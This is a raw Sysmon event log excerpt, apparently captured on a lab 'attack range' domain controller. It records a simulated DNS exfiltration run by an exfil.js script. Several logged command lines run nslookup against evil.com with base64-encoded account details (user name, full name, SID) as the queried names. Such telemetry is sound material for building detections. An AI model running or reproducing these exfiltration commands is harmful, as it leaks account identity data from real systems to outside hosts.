-retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldjeuo.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000213771Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.931{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlzms.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213770Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.900{2E1864BB-18F9-629A-9B45-000000005F02}62206448C:\Windows\system32\conhost.exe{2E1864BB-18F9-629A-9C45-000000005F02}6024C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213769Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.900{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-9C45-000000005F02}6024C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213768Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.900{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213767Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.899{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213766Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.898{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213765Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.897{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213764Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.897{2E1864BB-18F9-629A-9A45-000000005F02}16767152C:\Windows\system32\cmd.exe{2E1864BB-18F9-629A-9C45-000000005F02}6024C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213763Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.896{2E1864BB-18F9-629A-9C45-000000005F02}6024C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F9-629A-9A45-000000005F02}1676C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzms.tmp 2>&1 22542200x8000000000000000213762Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.809{00000000-0000-0000-0000-000000000000}2088evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213761Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.728{00000000-0000-0000-0000-000000000000}6652evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213760Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.642{00000000-0000-0000-0000-000000000000}3300evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213759Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.564{00000000-0000-0000-0000-000000000000}5404evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213758Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.452{00000000-0000-0000-0000-000000000000}8012evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213757Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.350{00000000-0000-0000-0000-000000000000}6372evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213756Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.237{00000000-0000-0000-0000-000000000000}5836evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213755Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.149{00000000-0000-0000-0000-000000000000}4284evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213754Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.047{00000000-0000-0000-0000-000000000000}3872evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213753Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.965{00000000-0000-0000-0000-000000000000}7688evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213752Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.901{00000000-0000-0000-0000-000000000000}7388evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000213751Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.845{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F9-629A-9B45-000000005F02}6220C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213750Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.845{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F9-629A-9B45-000000005F02}6220C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213749Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.845{2E1864BB-18F9-629A-9B45-000000005F02}62206448C:\Windows\system32\conhost.exe{2E1864BB-18F9-629A-9A45-000000005F02}1676C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213748Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.829{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-9B45-000000005F02}6220C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213747Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.829{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213746Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.829{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213745Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.829{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213744Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.829{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213743Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.829{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-9A45-000000005F02}1676C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213742Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.814{2E1864BB-18E0-629A-6742-000000005F02}39766016C:\Windows\System32\WScript.exe{2E1864BB-18F9-629A-9A45-000000005F02}1676C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213741Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.829{2E1864BB-18F9-629A-9A45-000000005F02}1676C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzms.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000213740Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.814{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlcdedx.tmpMD5=20783302D7601A2AA375A824723F16E5,SHA256=71E896EDC683926A4A0C6EDE66358751D292E4E8C82F0E9349EA1FBAA2ABF001,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213739Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.798{2E1864BB-18F9-629A-9845-000000005F02}26527656C:\Windows\system32\conhost.exe{2E1864BB-18F9-629A-9945-000000005F02}7368C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213738Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.792{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213737Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.792{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213736Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.792{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213735Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.792{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213734Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.776{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-9945-000000005F02}7368C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213733Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.776{2E1864BB-18F9-629A-9745-000000005F02}65764228C:\Windows\system32\cmd.exe{2E1864BB-18F9-629A-9945-000000005F02}7368C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213732Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.791{2E1864BB-18F9-629A-9945-000000005F02}7368C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com 